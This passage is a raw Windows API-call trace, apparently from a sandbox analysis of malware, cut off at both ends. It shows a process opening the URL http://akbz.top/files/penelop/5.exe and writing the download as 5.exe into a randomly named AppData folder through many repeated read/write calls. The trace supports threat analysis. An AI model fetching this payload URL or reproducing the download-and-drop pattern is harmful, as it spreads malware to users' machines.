RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x827) returned 0x3281f68 [0129.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://akbz.top/files/penelop/5.exe", cchWideChar=-1, lpMultiByteStr=0x3281f68, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://akbz.top/files/penelop/5.exe", lpUsedDefaultChar=0x0) returned 36 [0129.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0129.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3281f68 | out: hHeap=0x620000) returned 1 [0129.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325bc58 | out: hHeap=0x620000) returned 1 [0129.932] InternetOpenUrlA (hInternet=0xcc0028, lpszUrl="http://akbz.top/files/penelop/5.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0030 [0130.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0130.106] HttpQueryInfoW (in: hRequest=0xcc0030, dwInfoLevel=0x20000013, lpBuffer=0x9a0d6d0, lpdwBufferLength=0x9a0d710, lpdwIndex=0x0 | out: lpBuffer=0x9a0d6d0*, lpdwBufferLength=0x9a0d710*=0x4, lpdwIndex=0x0) returned 1 [0130.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32722a8 [0130.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32722a8 | out: hHeap=0x620000) returned 1 [0130.106] lstrcpyA (in: lpString1=0x321e628, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594" [0130.106] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594", pMore="5.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe") returned 1 [0130.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325af48 [0130.106] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0130.108] SetFilePointer (in: hFile=0x6f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.108] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.143] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.144] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.527] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.527] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.528] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.528] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.529] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.529] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.574] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.575] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.575] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.576] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.576] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.577] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.577] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.577] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.578] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.578] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.620] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.620] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.621] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.622] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.622] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.622] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.623] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.623] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.623] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.624] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.624] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.624] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.625] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.625] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.666] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.666] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.667] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.667] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.668] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.668] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.668] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.669] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.669] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.670] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.670] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.670] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.713] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.713] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.714] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.714] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.715] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.715] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.717] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.718] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.718] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.719] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.719] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.719] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.720] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.720] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.721] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.721] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.721] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.722] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.722] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.722] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.723] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.723] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.723] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.724] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.724] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.725] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.725] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.725] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.726] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.726] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.727] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.727] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.728] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.728] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.728] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.729] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.760] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.760] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.761] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.761] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.762] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.762] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.762] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.763] InternetReadFile (in: 